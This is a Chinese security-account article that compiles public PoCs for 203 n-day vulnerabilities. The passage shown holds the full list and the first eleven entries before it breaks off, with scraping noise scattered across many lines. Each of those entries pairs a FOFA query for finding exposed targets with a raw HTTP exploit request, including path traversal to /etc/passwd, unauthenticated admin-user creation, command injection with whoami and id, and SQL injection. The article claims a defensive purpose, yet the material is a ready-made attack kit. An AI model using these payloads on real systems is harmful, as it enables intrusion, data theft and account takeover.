互联网公开漏洞整理202309-202406
0 S; R4 w6 z- R, d道一安全 2024-06-05 07:41 北京
: C) m) ^; i4 L% m6 R4 t以下文章来源于网络安全新视界 ,作者网络安全新视界
7 z7 o- Q! `4 w! \1 U! [/ C
# d) i$ W4 W/ S1 ]8 l& \7 [8 ^4 p/ R发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
% a* I) d' n- p8 c& |" s* `+ q) `$ T$ m# a2 u) N
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
3 o+ I4 m# F1 b9 z" g) P
- j( j- E) z4 Q' P }" L安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。 @5 | W/ w% t
Q! V2 @9 N4 g/ y% b4 f
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。$ p' M3 O4 ?) u5 d! j' p
2 L f4 O+ t- c5 U; L' S# U8 I: l6 u
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。# x: ?) ]1 _, {
9 v) A) i4 L2 i$ i8 _2 L$ C/ X$ I+ C t% X
声明# `8 }5 E$ L* P5 y4 ]: @
7 Q9 n" G2 U! D- V' z' y9 h0 C' S为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。; K& f$ o, ~) A2 Z# Z/ A
! K7 l, O3 ?% J/ ~; |* T
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
3 W" z- H+ h/ p2 H( T
% j+ p& j* y8 T% H- z+ b, X- |
* i6 d! _' I" U' K" G* [' p( s
目录
$ \8 m/ d1 H6 T" a
& O( E% f/ U7 l& S01
8 b9 E7 K t4 J0 w& E8 m" i
$ m1 L# F E0 t+ W3 o2 b# @1. StarRocks MPP数据库未授权访问
) p' j* @) Z/ R7 x2. Casdoor系统static任意文件读取
3 M. _9 F! u" t0 k4 L8 }3. EasyCVR智能边缘网关 userlist 信息泄漏
" I0 ]6 H \# e x4. EasyCVR视频管理平台存在任意用户添加
! T9 s9 Y+ V, c4 ~$ ?5. NUUO NVR 视频存储管理设备远程命令执行
( h/ B% {# O' Z+ Z p3 ^9 g8 N' y6. 深信服 NGAF 任意文件读取
% y3 i6 P& T" Q8 t( ] H9 _7. 鸿运主动安全监控云平台任意文件下载
# j$ S7 _1 q0 N* ~8. 斐讯 Phicomm 路由器RCE
q$ S3 C# x9 Y" Q: q9. 稻壳CMS keyword 未授权SQL注入
$ L& ?9 k7 ?2 _) ?4 u10. 蓝凌EIS智慧协同平台api.aspx任意文件上传# k$ b R. ?" A
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) P$ V- B1 U7 G$ v3 b% ]" W5 v
12. Jorani < 1.0.2 远程命令执行
+ J' l; k. m1 s0 @/ `13. 红帆iOffice ioFileDown任意文件读取5 Z; v5 E9 y9 \* @7 {/ O
14. 华夏ERP(jshERP)敏感信息泄露6 D! p1 A- K* A" _6 s
15. 华夏ERP getAllList信息泄露
3 d8 y, Z& B O8 q7 ~9 z' a [16. 红帆HFOffice医微云SQL注入$ z# u8 s1 S( g# g3 B1 R
17. 大华 DSS itcBulletin SQL 注入8 L7 [: ~+ ~6 S% f* m" `+ l- O
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- b$ r- @' z- @, A0 G& l( f8 @19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入4 [6 ~2 y- c ^+ W
20. 大华ICC智能物联综合管理平台任意文件读取
3 S* G7 T4 S1 W+ U* S* }# N21. 大华ICC智能物联综合管理平台random远程代码执行
5 U. e' Z) N" K$ ~7 d) y* \0 P6 V22. 大华ICC智能物联综合管理平台 log4j远程代码执行
; Z4 q3 y: e7 j" a23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 I- a0 G) y8 k0 e6 X# h$ I5 `; K4 s7 ~
24. 用友NC 6.5 accept.jsp任意文件上传
$ k3 W) P" S6 z0 i25. 用友NC registerServlet JNDI 远程代码执行' C# i* C( k) e6 S6 F
26. 用友NC linkVoucher SQL注入" u7 ?& Z- ~( {" g: \9 N, {5 T. y
27. 用友 NC showcontent SQL注入/ v7 P E/ G# u; ^" d
28. 用友NC grouptemplet 任意文件上传
: I3 |7 a9 m1 y8 l2 b4 R29. 用友NC down/bill SQL注入# s$ I/ h5 E# `1 s4 \
30. 用友NC importPml SQL注入
' s% s) M$ @3 c' g31. 用友NC runStateServlet SQL注入8 }, }) g s1 m
32. 用友NC complainbilldetail SQL注入
$ {/ l" k b" [5 [7 s7 u4 c6 P$ z& ?33. 用友NC downTax/download SQL注入, ]) @$ l% t6 X3 @. a( U
34. 用友NC warningDetailInfo接口SQL注入
$ W8 D1 ~/ J( |- |35. 用友NC-Cloud importhttpscer任意文件上传
! h' A2 F! ^3 ~36. 用友NC-Cloud soapFormat XXE9 X% Q- e, j. C ]% u
37. 用友NC-Cloud IUpdateService XXE
' B- ^/ |3 q8 Y* R38. 用友U8 Cloud smartweb2.RPC.d XXE" l, v @& ?$ f& p& e3 l' _, Q9 Z
39. 用友U8 Cloud RegisterServlet SQL注入( x' L9 e0 w/ d2 J1 b% ]
40. 用友U8-Cloud XChangeServlet XXE6 A W& o4 ?) C# ~
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入+ i: W% X# b% }
42. 用友GRP-U8 SmartUpload01 文件上传+ w0 ~1 A7 ?5 z2 N6 \- d6 a2 N
43. 用友GRP-U8 userInfoWeb SQL注入致RCE$ {2 }- ~- ~# Y2 T" m
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% u$ x( P, E* G45. 用友GRP-U8 ufgovbank XXE3 q% p1 D' c u, H4 j
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
$ k- G2 _9 C5 V3 _: j, p! W- o47. 用友GRP A++Cloud 政府财务云 任意文件读取
$ [* A v# @6 g/ A" a48. 用友U8 CRM swfupload 任意文件上传
* ?# l- ~' I* x49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. A( m# s$ }( M9 `" b1 @; v% ~50. QDocs Smart School 6.4.1 filterRecords SQL注入
: q. s4 ?4 O2 l% ]+ @51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
0 E- I# b% f9 U! r4 }52. 泛微E-Office json_common.php sql注入; A$ c- @3 @+ T v0 n2 ~
53. 迪普 DPTech VPN Service 任意文件上传7 J: r% [& _, P3 I' q
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 f( U9 K2 v% d# s! N55. 畅捷通T+ getdecallusers信息泄露
5 v/ M, p8 H( b" n& v6 m) v56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
- N, q# i* ~& I& @& _. _57. 畅捷通T+ keyEdit.aspx SQL注入; S$ }, S" K1 C( {* L( t
58. 畅捷通T+ KeyInfoList.aspx sql注入5 y4 T4 y" z2 Z5 ?4 @% h
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
6 k( k3 z8 |% z& I, S60. 百卓Smart管理平台 importexport.php SQL注入
! a* @( I# C+ c61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! G: B0 \4 H# X' n) ?, J! G
62. IP-guard WebServer 远程命令执行
7 f3 _' |3 N6 b: v5 W$ a& q9 V63. IP-guard WebServer任意文件读取
/ Q1 Y6 M! O6 i% K6 v' m1 G64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ V3 [# }* r1 E# R% w1 y7 m( X65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
1 ~7 R ?( b5 F J' _66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入6 H5 x/ ?3 ?) ^ e
67. 万户ezOFFICE wpsservlet任意文件上传
6 X6 I0 C4 m! ]: V68. 万户ezOFFICE wf_printnum.jsp SQL注入
* |! J& C5 X8 X2 {& h69. 万户 ezOFFICE contract_gd.jsp SQL注入0 |' B; z! q1 L
70. 万户ezEIP success 命令执行
+ u) S3 _8 K! k% @& m2 ~$ {71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入: t, u" B! s8 y. J* z9 n
72. 致远OA getAjaxDataServlet XXE
4 b# F# I+ C" Z$ b73. GeoServer wms远程代码执行
; \) @& @# @- s B% g74. 致远M3-server 6_1sp1 反序列化RCE
+ r$ Z9 A8 e1 R$ R A$ b) C75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE) ]% T; ~7 [* d5 L# r4 Q/ N
76. 新开普掌上校园服务管理平台service.action远程命令执行
& I7 X" {" V, ^ t+ l+ `77. F22服装管理软件系统UploadHandler.ashx任意文件上传! }1 Q. d. f# K$ H
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 B. G& S6 Y& ]1 ^8 w79. BYTEVALUE 百为流控路由器远程命令执行! v, P: o. ?) G5 X4 s. g
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# ?: ]$ o( T, ~) R2 a! e' A0 H81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& o- g; S: E6 `$ e+ ^
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 A# b- X$ o( Z, D4 Q
83. JeecgBoot testConnection 远程命令执行
2 f2 P5 [1 {7 e8 W/ N84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 ?& X* G( i0 x( [8 O" r3 o+ A85. SysAid On-premise< 23.3.36远程代码执行
6 m- j7 Q/ m3 D9 v: V Y% J86. 日本tosei自助洗衣机RCE
$ X$ X4 Y* q, t0 ~% B3 g% d87. 安恒明御安全网关aaa_local_web_preview文件上传# {7 z5 E5 ~4 G; z. s
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行& U4 v+ ~$ [3 M/ }$ N: B
89. 致远互联FE协作办公平台editflow_manager存在sql注入
7 p- m9 N! s7 \' H; i7 O- }( d( m90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! S7 r8 ?* }# S( q" z( h91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
: h& D2 Q# B% \. n$ t) T, K92. 海康威视运行管理中心session命令执行
/ o0 D$ I. z$ \+ {. K8 g93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传, Z6 L( a3 \6 Y. Z& ?/ M7 x
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 Q6 N; ?- u# ]' F- C
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
; U9 W% W( Q+ f2 ?: J$ o96. Apache OFBiz 18.12.11 groovy 远程代码执行5 B1 e% n! j5 [8 B
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 V1 Z- q& Q1 _9 i, T98. SpiderFlow爬虫平台远程命令执行7 \# Y8 t5 {) i/ o- h* }% }
99. Ncast盈可视高清智能录播系统busiFacade RCE
t. s9 [% ?: P p, m1 \/ q- T" |* k100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 w- V" a; e) n V, w8 Y5 J101. ivanti policy secure-22.6命令注入
( n$ [4 v8 [/ ]" `0 n102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 v) G4 o, Z) J' Q6 Q
103. Ivanti Pulse Connect Secure VPN XXE
0 A8 J# W# j; d; X7 e7 n! _+ E# Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
+ c8 Y' V, _& o; h$ q7 u4 L105. SpringBlade v3.2.0 export-user SQL 注入
, F& S* b. x+ T0 [2 b" S106. SpringBlade dict-biz/list SQL 注入
# E* ^% ^% o9 Q, O* K, x V107. SpringBlade tenant/list SQL 注入5 x3 a" B; I/ }# w; h
108. D-Tale 3.9.0 SSRF
3 U; E. r: s& E, x" ?109. Jenkins CLI 任意文件读取5 p7 z0 a. i! M0 `( [8 Z7 ?( R
110. Goanywhere MFT 未授权创建管理员
* B, X W# V% N" V2 [3 g0 L111. WordPress Plugin HTML5 Video Player SQL注入
$ |8 W6 _$ e- f4 r0 x) s112. WordPress Plugin NotificationX SQL 注入
+ Z' H3 ^: Y+ v9 D" B8 ^' `- `113. WordPress Automatic 插件任意文件下载和SSRF
" X1 R; B9 R, Y$ p* R114. WordPress MasterStudy LMS插件 SQL注入
: f+ x! F3 u1 B2 A* ]115. WordPress Bricks Builder <= 1.9.6 RCE
/ x8 E- e) H' w$ Y2 ?& @116. wordpress js-support-ticket文件上传& X8 p c9 x- l
117. WordPress LayerSlider插件SQL注入; M# Q& z$ E+ d4 h
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
7 s. V0 B2 ^/ l: n" y119. 北京百绰智能S20后台sysmanageajax.php sql注入
- z" @9 H6 v7 _* s* L6 B120. 北京百绰智能S40管理平台导入web.php任意文件上传
& }/ W; H: i; X8 |- v121. 北京百绰智能S42管理平台userattestation.php任意文件上传 ]' f; H9 m/ G4 w$ I
122. 北京百绰智能s200管理平台/importexport.php sql注入8 [6 ^/ `- ], j; j
123. Atlassian Confluence 模板注入代码执行5 c7 }& J0 l: G
124. 湖南建研工程质量检测系统任意文件上传! b3 c) d$ x4 A1 k
125. ConnectWise ScreenConnect身份验证绕过) `) O4 X: c0 ?% P o; f
126. Aiohttp 路径遍历
, D& y/ z; t0 z8 X! G% x c, g127. 广联达Linkworks DataExchange.ashx XXE
% a# y I! n$ d4 |, b( s; U, Q128. Adobe ColdFusion 反序列化
( k$ l. e4 Z! }8 S! \129. Adobe ColdFusion 任意文件读取6 `9 e* \; r5 f, F( s6 r
130. Laykefu客服系统任意文件上传 N5 @ Z( M% n) m8 {
131. Mini-Tmall <=20231017 SQL注入
/ ^3 N- `' j8 d# H* f# ? q132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过( h" ]! E# Z4 N. v( U9 x( `
133. H5 云商城 file.php 文件上传+ v! t) I, i! `
134. 网康NS-ASG应用安全网关index.php sql注入
- `! S) w: l" F) n135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入6 N0 a9 l% G1 f( I
136. NextChat cors SSRF
3 L0 [$ T$ T1 f: c# q137. 福建科立迅通信指挥调度平台down_file.php sql注入7 G' p# ^7 L, q- E5 K% R
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入0 D' G2 M& p# G% c6 m% V- }
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
2 r7 d7 g! p7 f) f140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' A A: N$ p4 r4 V7 u( b5 U3 b( D
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
, v0 S) B/ | |; e% i7 R3 \$ I- V142. CMSV6车辆监控平台系统中存在弱密码
- }7 G7 e: p7 b$ T( s143. Netis WF2780 v2.1.40144 远程命令执行
1 T- n0 R% {8 D/ u3 R! R144. D-Link nas_sharing.cgi 命令注入- F5 @5 B S: h
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# E1 Z6 O) N2 l7 l- f- D* [! F
146. MajorDoMo thumb.php 未授权远程代码执行
+ G' K2 n' X1 a. {3 @* v147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
7 H# ~5 @, _9 K' u0 J148. CrushFTP 认证绕过模板注入
* U; `' I, Q0 j( Q+ R& p149. AJ-Report开源数据大屏存在远程命令执行
* v6 [3 \# Y4 [' h4 V150. AJ-Report 1.4.0 认证绕过与远程代码执行
- _5 G/ s- ^7 A! T& D/ f151. AJ-Report 1.4.1 pageList sql注入
4 V7 h; k2 \3 Z# c6 _* C) L4 h152. Progress Kemp LoadMaster 远程命令执行
! B' }# _+ B5 Z. u; N- v% |7 P153. gradio任意文件读取7 Q X: Y# r) r& k$ n
154. 天维尔消防救援作战调度平台 SQL注入' c% S! b9 f- ~
155. 六零导航页 file.php 任意文件上传
: C+ {! R7 r, p( V8 P4 ^156. TBK DVR-4104/DVR-4216 操作系统命令注入
) z. P7 H* u! L. Z157. 美特CRM upload.jsp 任意文件上传
: A& Q/ Y7 M* C158. Mura-CMS-processAsyncObject存在SQL注入; G. }9 C) v. a4 X; n& V" q6 f2 M
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
; E: P/ P4 ?( k160. Sonatype Nexus Repository 3目录遍历与文件读取
, W. t4 L l: j) m {7 P2 h+ q0 c# r) y1 H161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# z7 e9 o ]( m) U2 K162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 }. F2 e( O- d- N
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传$ Y0 M2 ?, E `4 U0 ~/ b
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传' [0 S' S, Z% n
165. OrangeHRM 3.3.3 SQL 注入0 Z4 [* d6 G. _5 ?
166. 中成科信票务管理平台SeatMapHandler SQL注入$ E+ s; U/ }1 F" S, M$ D, ^
167. 精益价值管理系统 DownLoad.aspx任意文件读取
1 Q0 I) E! c* t" Y( h; Z168. 宏景EHR OutputCode 任意文件读取3 y: V9 p% f4 V# Z; g
169. 宏景EHR downlawbase SQL注入
$ D. u4 x3 s$ b0 T6 N170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 B& |" F+ K" C0 T8 G4 O171. 通天星CMSV6车载定位监控平台 SQL注入
$ A# Q) |4 ~# i; Y: k% G8 o9 k172. DT-高清车牌识别摄像机任意文件读取
' m5 G' n2 q& T' B" _173. Check Point 安全网关任意文件读取
9 L; b; `8 j4 l0 ]; D" r174. 金和OA C6 FileDownLoad.aspx 任意文件读取# _8 ~& a+ C T" G
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入( T. T3 a' } z7 k5 B# K8 X
176. 电信网关配置管理系统 rewrite.php 文件上传- N3 ~0 s5 E$ i' w& y
177. H3C路由器敏感信息泄露
+ ~9 E* N2 a6 F/ E+ x* D178. H3C校园网自助服务系统-flexfileupload-任意文件上传& {: X$ @5 o( S5 j* o7 E
179. 建文工程管理系统存在任意文件读取
- g9 s& h, F5 Q! |/ ^- E180. 帮管客 CRM jiliyu SQL注入
+ S2 `' y7 B, _, {* b: P181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入/ H* v5 O. B3 c; U" _( \+ L/ K( d
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 Y' c7 p) R+ K183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 q, e6 ?; u; d/ p. w184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 \8 p2 j3 |& A7 E8 {* W& ?& \% y185. 瑞友天翼应用虚拟化系统SQL注入
/ E x0 X. {+ d186. F-logic DataCube3 SQL注入
' c: o5 k0 Y: M7 a, K& d. M: ^! }187. Mura CMS processAsyncObject SQL注入
* j4 R3 x) O) b% W) z; P188. 叁体-佳会视频会议 attachment 任意文件读取
( ?1 x% h3 v% W) E; R3 p: K/ K, ]189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% x* N1 f* N/ K190. 短视频矩阵营销系统 poihuoqu 任意文件读取) `1 d( t# S: ?: _
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入! u# {5 A3 A: h/ H) F
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
. O2 F9 ?* d3 _/ \4 p; c& m6 | p193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行4 d5 r+ M4 q. b
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
2 y+ O5 V/ A6 n5 G* {, L5 M# Y- Q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行3 w* Q, A% a7 f* Z7 A" y! Y6 D
196. 河南省风速科技统一认证平台密码重置( c0 N- Y- f% K2 @$ H5 c
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' m/ H4 }& W8 O2 g198. 阿里云盘 WebDAV 命令注入! Z' y0 g' f; B6 ?4 w
199. cockpit系统assetsmanager_upload接口 文件上传, s6 G# _3 i1 @% \. s" S% y
200. SeaCMS海洋影视管理系统dmku SQL注入- d) D' w7 L- ]- p" h
201. 方正全媒体新闻采编系统 binary SQL注入5 m9 O+ @4 k/ V k2 ^* I/ z9 t
202. 微擎系统 AccountEdit任意文件上传
) x2 e. u2 t" u! v( ?2 {) h& A- V203. 红海云EHR PtFjk 文件上传 _8 s w8 n- a/ h- C6 n
+ N7 A5 B0 Y% O) V; H3 d. ~( s+ Y
POC列表7 m6 l3 q" k0 z a3 q
4 X$ U1 b! _3 u' e
028 Q; c- l1 ^4 u+ |4 U$ N5 T( G
6 w' @2 R. n. W1. StarRocks MPP数据库未授权访问1 o) [$ ~. B- D
FOFA :title="StarRocks"
1 [% ^+ v9 J* g, o( y0 y: k2 {GET /mem_tracker HTTP/1.1
3 M, c5 Y) i4 ]( KHost: URL
! P% @' K2 k$ o: e: }3 W
& Z4 U7 \4 b0 H. \6 H) |
) I& h! G7 m9 h" x6 X( a2. Casdoor系统static任意文件读取
$ Z. l/ p, n! Y. e+ t( g0 tFOFA :title="Casdoor"6 E) e9 y% r" ?9 b* Y
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1) E: ` z% b7 b. c! [) }
Host: xx.xx.xx.xx:9999! |; F' [1 ^$ Q" G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 n$ m& ?: x7 Z$ r7 L0 L4 |' jConnection: close7 }7 `, e& m# b8 L! n+ j$ M: X* ]
Accept: */*# u) k: O7 v6 ]/ v! {# q1 m3 a, ~6 D3 P
Accept-Language: en
0 q" f8 Y* V( x( DAccept-Encoding: gzip! b+ F6 U# G! q" H
: Z- l* a8 e$ m
( @! T7 F5 w2 F+ F8 C! w; T% S3. EasyCVR智能边缘网关 userlist 信息泄漏
7 w: E6 n, J: Z kFOFA :title="EasyCVR"4 W+ ], m, F5 j: O) `5 _2 \
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.10 q I% u$ j' I: v- l8 k- J
Host: xx.xx.xx.xx
/ ?5 [1 D$ R/ C/ A: N9 f1 d
2 y6 Z9 U) z8 j- Y2 P1 y
# j1 S" v O+ }% I6 _4. EasyCVR视频管理平台存在任意用户添加! M7 N9 L) a) t4 ^- Q
FOFA :title="EasyCVR"! j0 ?5 H1 y* A& O, }0 x2 b4 a9 I) k
" q9 q) }9 w5 X' J, c. m& M! Dpassword更改为自己的密码md5
# d( i2 {2 T7 H8 x* O9 _POST /api/v1/adduser HTTP/1.1- o) Q% V u, A
Host: your-ip
4 H: e+ O6 X2 `# PContent-Type: application/x-www-form-urlencoded; charset=UTF-8. {* N; u; _, l H
% Y' l5 z0 |' r2 w+ @3 y
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1# O( ^# ^% G: k
. @/ g* a$ m! }/ U& n: C/ S+ y
# b4 P. ?% s0 S
5. NUUO NVR 视频存储管理设备远程命令执行' i, b% B, H: D8 [/ z
FOFA:title="Network Video Recorder Login") Q2 [: t6 h. r4 U) E& v% a% Q
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.13 D: A$ @4 X8 l7 t# o2 s+ p4 M# V
Host: xx.xx.xx.xx
: b b. ?+ n+ K' T5 {
0 R7 |$ a: r; T5 [- ~$ p( ~' J& a1 W4 p7 w, C% x. L0 j
6. 深信服 NGAF 任意文件读取9 h! i% o/ h: e0 Z
FOFA:title="SANGFOR | NGAF"
8 v# [5 \' Q0 i. W- T, l3 PGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
$ k5 k0 y' v8 u0 I* O* cHost:
9 f2 r6 e/ B4 s/ i% E4 G0 A5 X+ W: X/ R- R% h0 d5 A
. B+ b! S; d6 _% F$ [( c1 A7. 鸿运主动安全监控云平台任意文件下载8 P3 x4 W1 ?% F+ | A
FOFA:body="./open/webApi.html"
; ]' X3 f, ^! K. y p3 k! rGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
% g3 q/ s4 r/ R* fHost:" `! X C( O( L% m
5 ?4 D7 [ b, [* d/ C
" ?" K( r1 I6 D0 d! N; e; V8. 斐讯 Phicomm 路由器RCE
2 e# n! D+ E$ ~5 Z1 Q$ Y4 ^FOFA:icon_hash="-1344736688"
4 d$ Z2 o$ v; M默认账号admin登录后台后,执行操作& y. w- j1 ^6 D& e. K9 V- T
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.18 y3 b6 a! b4 X* N2 N
Host: x.x.x.x
' G0 H3 v( Z: \7 L1 s5 F+ dCookie: sysauth=第一步登录获取的cookie
. W2 j7 Z2 P0 C- R, I+ LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
( o4 O9 @, [: H$ g; x7 y' G lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 O8 U$ A4 L: z- ]4 [- g: j4 _- {# W3 ^: P8 c
------WebKitFormBoundaryxbgjoytz
0 V. E( D; l0 n- F7 p' oContent-Disposition: form-data; name="wifiRebootEnablestatus"
" x# R9 r% S( I0 s$ P+ H9 W' [
%s1 j: F& j: Q+ d
------WebKitFormBoundaryxbgjoytz
9 k& o9 l. j- q: n5 ?" rContent-Disposition: form-data; name="wifiRebootrange"
5 F9 |5 n1 W5 Z6 r( k
% }9 }6 x3 e1 I$ b0 j- _* Z12:00; id;( s& n& ?! k* x1 N
------WebKitFormBoundaryxbgjoytz
' z- i1 H7 z9 ^ j; Y7 i. d( zContent-Disposition: form-data; name="wifiRebootendrange"
7 |) S3 r: O/ [7 Q" H/ x! v6 b9 Q( u f; G! y h, O
%s:) O P* d* G& y$ Z3 ~& w/ v
------WebKitFormBoundaryxbgjoytz
1 G) i& Y* ^# W A" A2 R. L$ hContent-Disposition: form-data; name="cururl2"& d% l- D. D6 n! D# s: ]
0 K2 }: p. Z# G L! ?& p" \7 W' D0 P5 w9 ]8 C6 ^! g/ z7 D# j
------WebKitFormBoundaryxbgjoytz--
- Y4 k0 l- \+ `5 @
/ ?& d. Y5 X- w& {
5 e k; u1 }" x; i; O8 G9. 稻壳CMS keyword 未授权SQL注入! b4 x& [* |+ Y) Q$ J- D) ^
FOFA:app="Doccms"
% Z0 k' A, r2 S" t; nGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
3 D& T. P, x# q/ ~8 THost: x.x.x.x1 I4 t) p0 ~% C. R' c0 w$ |
3 F$ ]* S2 H( [0 N
4 R2 x& N. C, Y* e& q- g% |payload为下列语句的二次Url编码# p& f9 ~ H0 ~, q8 X) }& o( m6 j
# F/ ?' o M# ?6 j$ P5 y+ b' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#! a6 p' C/ x4 Q; M, z' y
7 c& \0 F0 P$ F" H9 A2 }* x, w
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 X+ ~' Q% z- w
FOFA:icon_hash="953405444"
1 [- e% B4 ]- ^$ h2 B
) P2 v4 Q" X. d4 ~文件上传后响应中包含上传文件的路径( Z1 U" U2 Z9 p0 ?9 c5 G
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
S7 `" K0 W7 |3 k7 ~, {2 d2 MHost: x.x.x.x:xx9 _& B2 D% r v5 z. p J0 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" Y6 |8 n/ W: MContent-Length: 1972 p9 e" j: ]9 c. C8 \& J4 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# W' C5 C6 p! Y" j7 D
Accept-Encoding: gzip, deflate0 @$ E7 @5 W# t y/ j' }
Accept-Language: zh-CN,zh;q=0.94 G# K' o6 O, R- L
Connection: close1 ^& c3 F8 h/ Z+ |) z/ F3 Z! ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ h, f1 o# n7 v% _/ E3 `! b j+ `, W+ X. s1 k
------WebKitFormBoundaryxdgaqmqu
& R0 p" \0 ]* y/ rContent-Disposition: form-data; name="file"filename="icfitnya.txt": D- j. p7 n0 E) f$ r+ ?! [* }( J
Content-Type: text/html5 j5 }$ z# a$ [ }- i
& e E; `0 z' T3 z f- a) S
jmnqjfdsupxgfidopeixbgsxbf
& m! n8 c% Y1 |& ~6 _! p------WebKitFormBoundaryxdgaqmqu--
" s+ Y9 j4 |' ]8 _! K& h+ @
' X6 E- \& g( m* E7 f; g5 V
8 e7 X: a: X0 o9 V" e# c& r11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 ]- B6 s9 X' Z! c) \. J
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
